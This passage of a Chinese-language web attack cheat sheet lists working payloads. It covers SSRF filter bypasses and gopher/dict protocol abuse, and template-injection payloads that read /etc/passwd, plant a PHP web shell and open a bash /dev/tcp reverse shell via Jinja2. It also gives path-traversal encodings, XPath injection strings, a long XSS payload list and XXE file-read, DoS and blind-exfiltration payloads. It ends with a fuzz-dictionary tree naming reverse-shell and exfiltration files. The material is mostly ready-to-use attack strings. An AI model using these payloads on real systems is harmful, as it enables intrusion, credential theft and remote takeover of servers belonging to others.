1、使用HTTPS https://localhost/ 2、使用[::] http://[::]:80/ http://0000::1:80/ 3、使用重定向 localtest.me 127.0.0.1.xip.io www.owasp.org.127.0.0.1.xip.io customer1.app.localhost.my.company.127.0.0.1.nip.io 4、使用CIDR(不知道是不是要配置什麼,沒利用成功) 127.x.x.x http://127.127.127.127 http://127.0.1.3 http://127.0.0.0 http://mail.ebc.apple.com => 127.0.0.6 => localhost 5、使用異常urls localhost:+11211aaa localhost:00011211aaaa 參考:https://low-level.readthedocs.io/en/latest/documents/SSRFbible.Cheatsheet.pdf 6、使用進位制 可以是十六進位制,八進位制等。 115.239.210.26>>>16373751032 首先把這四段數字給分別轉成16進位制,結果:73 ef d2 1a 然後把 73efd21a 這十六進位制一起轉換成8進位制 記得訪問的時候加0表示使用八進位制(可以是一個0也可以是多個0 跟XSS中多加幾個0來繞過過濾一樣),十六進位制加0x http://127.0.0.1>>>http://0177.0.0.1/ http://127.0.0.1>>>http://2130706433/ http://192.168.0.1>>>http://3232235521/ http://192.168.1.1>>>http://3232235777/ 7、使用特殊地址 http://0/ 8、使用@ http://[email protected] http://wwww.example.com\x40www.baidu.com http://wwww.example.com%40www.baidu.com 技巧組合: http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 + httplib: 1.1.1.1 requests + browsers: 2.2.2.2 urllib: 3.3.3.3 9、使用enclosed alphanumerics http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 10、利用解析器 http://127.1.1.1:80\@127.2.2.2:80/ http://127.1.1.1:80\@@127.2.2.2:80/ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ 參考:https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf 11、利用協議 File協議 file:///etc/passwd file://\/\/etc/passwd Dict協議 dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n> ssrf.php?url=dict://attacker:11111/ SFTP協議 ssrf.php?url=sftp://example.com:11111/ TFTP協議 ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET LDAP協議 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit Gopher協議 ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
工具
SSRFmap - https://github.com/swisskyrepo/SSRFmap Gopherus - https://github.com/tarunkant/Gopherus http://blog.w2n1ck.com/ip.py
16、SSTI
Ruby
<%= 7 * 7 %> => 49 <%= File.open('/etc/passwd').read %> => cat /etc/passwd <%= Dir.entries('/') %> => ls /
Java
${7*7} ${{7*7}} ${class.getClassLoader()} ${class.getResource("").getPath()} ${class.getResource("../../../../../index.htm").getContent()} 獲取系統環境變數: ${T(java.lang.System).getenv()} 獲取/etc/passwd: ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Twig
{{7*7}} == {{7*'7'}} == 49 命令執行: {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
Smarty
{php}echo `id`;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Jinja2
{{4*4}}[[5*5]] {{7*'7'}} => 7777777 獲取使用的類 {{ [].class.base.subclasses() }} {{''.class.mro()[1].subclasses()}} {{ ''.__class__.__mro__[2].__subclasses__() }} 獲取配置變數 {% for key, value in config.iteritems() %} <dt>{{ key|e }}</dt> <dd>{{ value|e }}</dd> {% endfor %} 讀取檔案 ''.__class__.__mro__[2].__subclasses__()[40] 表示檔案類 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} 寫檔案 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/hello.txt', 'w').write('Hello here !') }} 反彈shell 1、配置 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} 2、載入 {{ config.from_pyfile('/tmp/evilconfig.cfg') }} 3、連線 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
工具
Tplmap - https://github.com/epinna/tplmap python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
17、CSTI
AngularJS
$eval('1+1') {{1+1}}
Vue JS
{{constructor.constructor('alert(1)')()}}
18、目錄遍歷
1、Basic ../ ..\ ..\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\ 2、Unicode編碼 . = %u002e / = %u2215 \ = %u2216 3、url雙編碼 . = %252e / = %252f \ = %255c 4、UTF-8 Unicode編碼 . = %c0%2e, %e0%40%ae, %c0ae / = %c0%af, %e0%80%af, %c0%2f \ = %c0%5c, %c0%80%5c
19、檔案上傳
Exploit
這裡只舉一下可以利用的點,就不一一詳細例舉了。 1、黑名單繞過 2、雙檔案上傳 3、陣列 4、修改特殊欄位 5、截斷 6、解析漏洞 7、ffmpeg 8、flash 9、imagemagic 10、zip軟連線 11、htaccess 12、iis 13、ssi 14、pdf 15、python 16、csp 17、xss 18、超大檔案ddos 19、xxe 20、URL跳轉
20、XPATH注入
SQL: string(//user[name/text()='" +username+ "' and password/text()=’" +password+ "']/account/text()) Payloads: ' or '1'='1 ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 盲注: 1、獲取長度 and string-length(account)=SIZE_INT 2、獲取內容 substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
21、XSS
Basic
<script>alert('XSS')</script> <scr<script>ipt>alert('XSS')</scr<script>ipt> "><script>alert('XSS')</script> "><script>alert(String.fromCharCode(88,83,83))</script> <img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')// <img src=x onerror=alert(String.fromCharCode(88,83,83));> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> <img src=x:alert(alt) onerror=eval(src) alt=xss> "><img src=x onerror=alert('XSS');> "><img src=x onerror=alert(String.fromCharCode(88,83,83));> <svg/onload=alert('XSS')> <svg onload=alert(1)// <svg/onload=alert(String.fromCharCode(88,83,83))> <svg id=alert(1) onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(/XSS/) <body onload=alert(/XSS/.source)> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video/poster/onerror=alert(1)> <video><source onerror="javascript:alert(1)"> <video src=_ onloadstart="alert(1)"> <details/open/ontoggle="alert`1`"> <audio src onloadstart=alert(1)> <marquee onstart=alert(1)> <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter> <body ontouchstart=alert(1)> <body ontouchend=alert(1)> <body ontouchmove=alert(1)> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> javascript協議 javascript:prompt(1) %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 javascript:confirm(1) \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) \152\141\166\141\163\143\162\151\160\164\072alert(1) java%0ascript:alert(1) - LF (\n) java%09script:alert(1) - tab (\t) java%0dscript:alert(1) - CR (\r) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) - escape javascript://%0Aalert(1) javascript://anything%0D%0A%0D%0Awindow.alert(1) data協議 data:text/html,<script>alert(0)</script> data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
XML檔案
// 使用CDATA防止payload被解析成xml <html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> <info> <name> <value><![CDATA[<script>confirm(document.domain)</script>]]></value> </name> <description> <value>Hello</value> </description> <url> <value>http://www.baidu.com</value> </url> </info> </body> </html>
SVG檔案
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg>
SWF
flashmediaelement.swf?jsinitfunctio%gn=alert`1` flashmediaelement.swf?jsinitfunctio%25gn=alert(1) ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf plupload.flash.swf?%#target%g=alert&uid%g=XSS& moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true video-js.swf?readyFunction=alert(1) player.swf?playerready=alert(document.cookie) player.swf?tracecall=alert(document.cookie) banner.swf?clickTAG=javascript:alert(1);// io.swf?yid=\"));}catch(e){alert(1);}// video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
CSS
<!DOCTYPE html> <html> <head> <style> div{ background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>"); background-color: #cccccc; } </style> </head> <body> <div>lol</div> </body> </html>
22、XXE
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> Base64 <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/> PHP協議 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" > ]> <foo>&xxe;</foo> DOS <!DOCTYPE data [ <!ENTITY a0 "dos" > <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> ]> <data>&a4;</data> 盲注 傳送payload: <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> 遠端主機上檔案: http://127.0.0.1/dtd.xml <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> XXE in File DOCX/XLSX/PPTX ODT/ODG/ODP/ODS SVG XML PDF (experimental) JPG (experimental) GIF (experimental) 利用工具: https://github.com/BuffaloWill/oxml_xxe 線上生成工具: https://buer.haus/xxegen/
有興趣的可以根據相關思路做個漏洞fuzz的字典,很有用的
w2n1ck@w2n1ck ~/Desktop/vul_fuzz tree -FC . ├── api.txt ├── command_exec.txt ├── crlf.txt ├── dicc.txt ├── directory_traversal.txt ├── ldap_attributes.txt ├── lfi.txt ├── nosql.txt ├── open_redirect.txt ├── php.txt ├── sqli/ │ ├── sqli.txt │ ├── sqli_error.txt │ ├── sqli_mssql.txt │ ├── sqli_mssql_insert.txt │ ├── sqli_mssql_where.txt │ ├── sqli_mysql.txt │ ├── sqli_mysql_insert.txt │ ├── sqli_mysql_order_by.txt │ ├── sqli_mysql_where.txt │ ├── sqli_oracle.txt │ ├── sqli_postgres.txt │ ├── sqli_time.txt │ └── sqli_union.txt ├── ssi.txt ├── upload/ │ ├── ffmpeg/ │ │ ├── gen_avi_bypass.py │ │ ├── gen_xbin_avi.py │ │ ├── read_passwd.avi │ │ ├── read_passwd_bypass.mp4 │ │ ├── read_shadow.avi │ │ └── read_shadow_bypass.mp4 │ ├── flash/ │ │ ├── xss.swf │ │ └── xssproject.swf │ ├── htaccess/ │ │ └── 1.jpg │ ├── iis/ │ │ ├── index.stm │ │ └── web.config │ ├── imagemagic/ │ │ ├── centos_id.jpg │ │ ├── payload_imageover_file_exfiltration_pangu_wrapper.jpg │ │ ├── payload_imageover_file_exfiltration_text_wrapper.jpg │ │ ├── payload_imageover_reverse_shell_devtcp.jpg │ │ ├── payload_imageover_reverse_shell_netcat_fifo.png │ │ ├── payload_imageover_wget.gif │ │ ├── payload_url_bind_shell_nc.mvg │ │ ├── payload_url_curl.png │ │ ├── payload_url_portscan.jpg │ │ ├── payload_url_remote_connection.mvg │ │ ├── payload_url_reverse_shell_bash.mvg │ │ ├── payload_url_touch.jpg │ │ ├── payload_xml_reverse_shell_nctraditional.xml │ │ ├── payload_xml_reverse_shell_netcat_encoded.xml │ │ ├── ubuntu_id.jpg │ │ └── ubuntu_shell.jpg │ ├── pdf/ │ │ ├── poc.js │ │ ├── poc.py │ │ └── result.pdf │ ├── php_ext/ │ │ ├── phpinfo.jpg.php │ │ ├── phpinfo.php3 │ │ ├── phpinfo.php4 │ │ ├── phpinfo.php5 │ │ ├── phpinfo.php7 │ │ ├── phpinfo.phpt │ │ ├── phpinfo.pht │ │ └── phpinfo.phtml │ ├── picture/ │ │ ├── Build_image_to_LFI.py │ │ ├── php_exif_data.png │ │ ├── phpinfo-metadata.gif │ │ ├── phpinfo-metadata.jpg │ │ ├── shell_cinema.gif │ │ ├── shell_fr.gif │ │ └── shell_problem.gif │ ├── python/ │ │ ├── python-admin-__init__.py.zip │ │ ├── python-conf-__init__.py.zip │ │ ├── python-config-__init__.py.zip │ │ ├── python-controllers-__init__.py.zip │ │ ├── python-generate-init.py │ │ ├── python-login-__init__.py.zip │ │ ├── python-models-__init__.py.zip │ │ ├── python-modules-__init__.py.zip │ │ ├── python-scripts-__init__.py.zip │ │ ├── python-settings-__init__.py.zip │ │ ├── python-tests-__init__.py.zip │ │ ├── python-urls-__init__.py.zip │ │ ├── python-utils-__init__.py.zip │ │ └── python-view-__init__.py.zip │ ├── ssi/ │ │ ├── exec.shtml │ │ └── include.shtml │ └── zip_link/ │ ├── etc_passwd.zip │ ├── generate.sh │ └── passwd ├── web_cache_deception_attack_headers.txt ├── xpath_injection.txt ├── xss/ │ ├── "><img\ src=x\ onerror=alert(document.cookie);.jpg │ ├── "><svg\ onload=alert(1)> │ ├── xss_comment_exif_metadata_double_quote.png │ ├── xss_flashfile.swf │ ├── xss_intruders.txt │ ├── xss_payloads.txt │ ├── xss_svg.svg │ ├── xss_svg1.svg │ ├── xss_svg2.svg │ ├── xss_svg3.svg │ ├── xss_swf.swf │ ├── xss_swf_fuzz.txt │ ├── xss_xml.xml │ └── xss_xml_cheatsheet.html └── xxe/ ├── xml-attacks.txt ├── xxe_etc_passwd.xml ├── xxe_fuzzing.txt └── xxe_php_wrapper.xml